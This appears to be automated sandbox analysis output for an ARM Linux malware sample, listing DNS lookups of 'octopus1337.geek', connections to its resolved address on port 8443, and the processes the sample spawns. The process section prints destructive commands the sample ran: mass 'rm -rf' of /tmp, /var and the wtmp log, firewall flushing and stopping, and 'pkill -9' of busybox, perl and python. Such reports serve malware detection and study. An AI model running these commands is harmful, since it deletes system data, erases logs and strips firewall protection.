                                                                                                  Oct 6, 2024 15:54:07.976278067 CEST844332780156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:54:08.552167892 CEST844332780156.238.224.214192.168.2.23
                                                                                                  Oct 6, 2024 15:54:08.552283049 CEST327808443192.168.2.23156.238.224.214
                                                                                                  Oct 6, 2024 15:54:08.557198048 CEST844332780156.238.224.214192.168.2.23
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 6, 2024 15:52:17.473607063 CEST5620853192.168.2.2351.77.149.139
                                                                                                  Oct 6, 2024 15:52:17.482528925 CEST535620851.77.149.139192.168.2.23
                                                                                                  Oct 6, 2024 15:52:18.263221979 CEST5198453192.168.2.2351.77.149.139
                                                                                                  Oct 6, 2024 15:52:18.272103071 CEST535198451.77.149.139192.168.2.23
                                                                                                  Oct 6, 2024 15:52:19.081847906 CEST4564753192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:52:20.003859997 CEST3832753192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:52:24.086541891 CEST3921253192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:52:25.011879921 CEST3907053192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:52:29.092065096 CEST4400753192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:52:30.018946886 CEST4325953192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:52:34.097790956 CEST4870153192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:52:35.021945000 CEST5413353192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:52:39.103689909 CEST4296253192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:52:40.027085066 CEST5501053192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:52:45.690465927 CEST3510153192.168.2.23185.181.61.24
                                                                                                  Oct 6, 2024 15:52:45.723854065 CEST5335101185.181.61.24192.168.2.23
                                                                                                  Oct 6, 2024 15:52:46.683186054 CEST3693853192.168.2.23185.181.61.24
                                                                                                  Oct 6, 2024 15:52:46.716460943 CEST5336938185.181.61.24192.168.2.23
                                                                                                  Oct 6, 2024 15:52:47.300944090 CEST6029753192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:52:47.311994076 CEST3587053192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:52:47.323050022 CEST4977453192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:52:47.334518909 CEST5682853192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:52:47.346795082 CEST3648653192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:52:48.300628901 CEST4196853192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:52:48.313282013 CEST5757053192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:52:48.324147940 CEST5978653192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:52:53.329629898 CEST3832053192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:52:53.342211962 CEST5943653192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:52:58.443348885 CEST4082553192.168.2.2351.77.149.139
                                                                                                  Oct 6, 2024 15:52:58.452469110 CEST534082551.77.149.139192.168.2.23
                                                                                                  Oct 6, 2024 15:53:00.055212975 CEST5294153192.168.2.2381.169.136.222
                                                                                                  Oct 6, 2024 15:53:00.082515001 CEST535294181.169.136.222192.168.2.23
                                                                                                  Oct 6, 2024 15:53:01.698718071 CEST5071553192.168.2.2351.158.108.203
                                                                                                  Oct 6, 2024 15:53:01.714318991 CEST535071551.158.108.203192.168.2.23
                                                                                                  Oct 6, 2024 15:53:03.361418962 CEST5494753192.168.2.2391.217.137.37
                                                                                                  Oct 6, 2024 15:53:08.368601084 CEST3367653192.168.2.2391.217.137.37
                                                                                                  Oct 6, 2024 15:53:13.369720936 CEST5756553192.168.2.2391.217.137.37
                                                                                                  Oct 6, 2024 15:53:18.373811960 CEST5198753192.168.2.2391.217.137.37
                                                                                                  Oct 6, 2024 15:53:23.379064083 CEST5892053192.168.2.2391.217.137.37
                                                                                                  Oct 6, 2024 15:53:30.000184059 CEST5622553192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:53:30.011380911 CEST3706553192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:53:30.022667885 CEST4957253192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:53:30.036006927 CEST4123153192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:53:30.047828913 CEST4295053192.168.2.2394.16.114.254
                                                                                                  Oct 6, 2024 15:53:33.241893053 CEST5505353192.168.2.23134.195.4.2
                                                                                                  Oct 6, 2024 15:53:33.256072044 CEST5355053134.195.4.2192.168.2.23
                                                                                                  Oct 6, 2024 15:53:36.457094908 CEST4696753192.168.2.2381.169.136.222
                                                                                                  Oct 6, 2024 15:53:36.485042095 CEST534696781.169.136.222192.168.2.23
                                                                                                  Oct 6, 2024 15:53:38.071083069 CEST3777253192.168.2.2351.158.108.203
                                                                                                  Oct 6, 2024 15:53:38.086980104 CEST533777251.158.108.203192.168.2.23
                                                                                                  Oct 6, 2024 15:53:42.946185112 CEST3663753192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:53:47.948697090 CEST5284253192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:53:52.952255011 CEST4288153192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:53:57.955873013 CEST5512253192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:54:02.959009886 CEST4990253192.168.2.2351.254.162.59
                                                                                                  Oct 6, 2024 15:54:09.553556919 CEST5528753192.168.2.2391.217.137.37
                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                  Oct 6, 2024 15:52:47.310858965 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:52:47.321966887 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:52:47.333009958 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:52:47.344398022 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:52:47.356772900 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:52:48.312263012 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:52:48.323251009 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:52:53.339708090 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:52:53.352169037 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:53:03.493963957 CEST77.87.200.186192.168.2.23e9b0(Host unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:53:08.420653105 CEST77.87.200.186192.168.2.23e9b0(Host unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:53:13.423031092 CEST77.87.200.186192.168.2.23e9b0(Host unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:53:18.425625086 CEST77.87.200.186192.168.2.23e9b0(Host unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:53:24.038023949 CEST77.87.200.186192.168.2.23e9b0(Host unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:53:30.010278940 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:53:30.021425962 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:53:30.032922983 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:53:30.046065092 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:53:30.057740927 CEST94.16.114.254192.168.2.239106(Port unreachable)Destination Unreachable
                                                                                                  Oct 6, 2024 15:54:09.607215881 CEST77.87.200.186192.168.2.23e025(Host unreachable)Destination Unreachable
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Oct 6, 2024 15:52:17.473607063 CEST192.168.2.2351.77.149.1390xd23cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:18.263221979 CEST192.168.2.2351.77.149.1390xd23cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:19.081847906 CEST192.168.2.2351.254.162.590x86bbStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:20.003859997 CEST192.168.2.2351.254.162.590x86bbStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:24.086541891 CEST192.168.2.2351.254.162.590x86bbStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:25.011879921 CEST192.168.2.2351.254.162.590x86bbStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:29.092065096 CEST192.168.2.2351.254.162.590x86bbStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:30.018946886 CEST192.168.2.2351.254.162.590x86bbStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:34.097790956 CEST192.168.2.2351.254.162.590x86bbStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:35.021945000 CEST192.168.2.2351.254.162.590x86bbStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:39.103689909 CEST192.168.2.2351.254.162.590x86bbStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:40.027085066 CEST192.168.2.2351.254.162.590x86bbStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:45.690465927 CEST192.168.2.23185.181.61.240x6ebcStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:46.683186054 CEST192.168.2.23185.181.61.240x6ebcStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:47.300944090 CEST192.168.2.2394.16.114.2540xbcd5Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:47.311994076 CEST192.168.2.2394.16.114.2540xbcd5Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:47.323050022 CEST192.168.2.2394.16.114.2540xbcd5Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:47.334518909 CEST192.168.2.2394.16.114.2540xbcd5Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:47.346795082 CEST192.168.2.2394.16.114.2540xbcd5Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:48.300628901 CEST192.168.2.2394.16.114.2540xbcd5Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:48.313282013 CEST192.168.2.2394.16.114.2540xbcd5Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:48.324147940 CEST192.168.2.2394.16.114.2540xbcd5Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:53.329629898 CEST192.168.2.2394.16.114.2540xbcd5Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:53.342211962 CEST192.168.2.2394.16.114.2540xbcd5Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:58.443348885 CEST192.168.2.2351.77.149.1390xab50Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:00.055212975 CEST192.168.2.2381.169.136.2220x50dfStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:01.698718071 CEST192.168.2.2351.158.108.2030x9ab0Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:03.361418962 CEST192.168.2.2391.217.137.370xb6b6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:08.368601084 CEST192.168.2.2391.217.137.370xb6b6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:13.369720936 CEST192.168.2.2391.217.137.370xb6b6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:18.373811960 CEST192.168.2.2391.217.137.370xb6b6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:23.379064083 CEST192.168.2.2391.217.137.370xb6b6Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:30.000184059 CEST192.168.2.2394.16.114.2540x1737Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:30.011380911 CEST192.168.2.2394.16.114.2540x1737Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:30.022667885 CEST192.168.2.2394.16.114.2540x1737Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:30.036006927 CEST192.168.2.2394.16.114.2540x1737Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:30.047828913 CEST192.168.2.2394.16.114.2540x1737Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:33.241893053 CEST192.168.2.23134.195.4.20xc988Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:36.457094908 CEST192.168.2.2381.169.136.2220x9c9cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:38.071083069 CEST192.168.2.2351.158.108.2030xe353Standard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:42.946185112 CEST192.168.2.2351.254.162.590xeb2cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:47.948697090 CEST192.168.2.2351.254.162.590xeb2cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:52.952255011 CEST192.168.2.2351.254.162.590xeb2cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:57.955873013 CEST192.168.2.2351.254.162.590xeb2cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:54:02.959009886 CEST192.168.2.2351.254.162.590xeb2cStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:54:09.553556919 CEST192.168.2.2391.217.137.370xad2bStandard query (0)octopus1337.geekA (IP address)IN (0x0001)false
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Oct 6, 2024 15:52:17.482528925 CEST51.77.149.139192.168.2.230xd23cNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:18.272103071 CEST51.77.149.139192.168.2.230xd23cNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:45.723854065 CEST185.181.61.24192.168.2.230x6ebcNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:46.716460943 CEST185.181.61.24192.168.2.230x6ebcNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:52:58.452469110 CEST51.77.149.139192.168.2.230xab50No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:00.082515001 CEST81.169.136.222192.168.2.230x50dfNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:01.714318991 CEST51.158.108.203192.168.2.230x9ab0No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:33.256072044 CEST134.195.4.2192.168.2.230xc988No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:36.485042095 CEST81.169.136.222192.168.2.230x9c9cNo error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2024 15:53:38.086980104 CEST51.158.108.203192.168.2.230xe353No error (0)octopus1337.geek156.238.224.214A (IP address)IN (0x0001)false

                                                                                                  System Behavior

                                                                                                  Start time (UTC):13:51:47
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:/tmp/arm5.elf
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:51:47
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:51:47
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:47
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:47
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/rm
                                                                                                  Arguments:rm -rf /tmp/arm5.elf /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-OmYV2g /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-McPs7g /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf /var/log/wtmp
                                                                                                  File size:72056 bytes
                                                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                  Start time (UTC):13:51:53
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:51:53
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "rm -rf /tmp/*"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:53
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:53
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/rm
                                                                                                  Arguments:rm -rf /tmp/*
                                                                                                  File size:72056 bytes
                                                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                                                                  Start time (UTC):13:51:53
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:51:53
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "iptables -F"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:53
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:53
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/iptables
                                                                                                  Arguments:iptables -F
                                                                                                  File size:99296 bytes
                                                                                                  MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                                                                                  Start time (UTC):13:51:53
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:51:54
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "pkill -9 busybox"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:54
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:54
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/pkill
                                                                                                  Arguments:pkill -9 busybox
                                                                                                  File size:30968 bytes
                                                                                                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                                  Start time (UTC):13:51:55
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:51:55
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "pkill -9 perl"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:55
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:55
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/pkill
                                                                                                  Arguments:pkill -9 perl
                                                                                                  File size:30968 bytes
                                                                                                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                                  Start time (UTC):13:51:58
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:51:58
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "pkill -9 python"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:58
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:58
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/pkill
                                                                                                  Arguments:pkill -9 python
                                                                                                  File size:30968 bytes
                                                                                                  MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/tmp/arm5.elf
                                                                                                  Arguments:-
                                                                                                  File size:4956856 bytes
                                                                                                  MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:sh -c "service iptables stop"
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/bin/sh
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:service iptables stop
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/basename
                                                                                                  Arguments:basename /usr/sbin/service
                                                                                                  File size:39256 bytes
                                                                                                  MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/basename
                                                                                                  Arguments:basename /usr/sbin/service
                                                                                                  File size:39256 bytes
                                                                                                  MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/sbin/service
                                                                                                  Arguments:-
                                                                                                  File size:129816 bytes
                                                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                  Start time (UTC):13:51:59
                                                                                                  Start date (UTC):06/10/2024
                                                                                                  Path:/usr/bin/systemctl
                                                                                                  Arguments:systemctl --quiet is-active multi-user.target
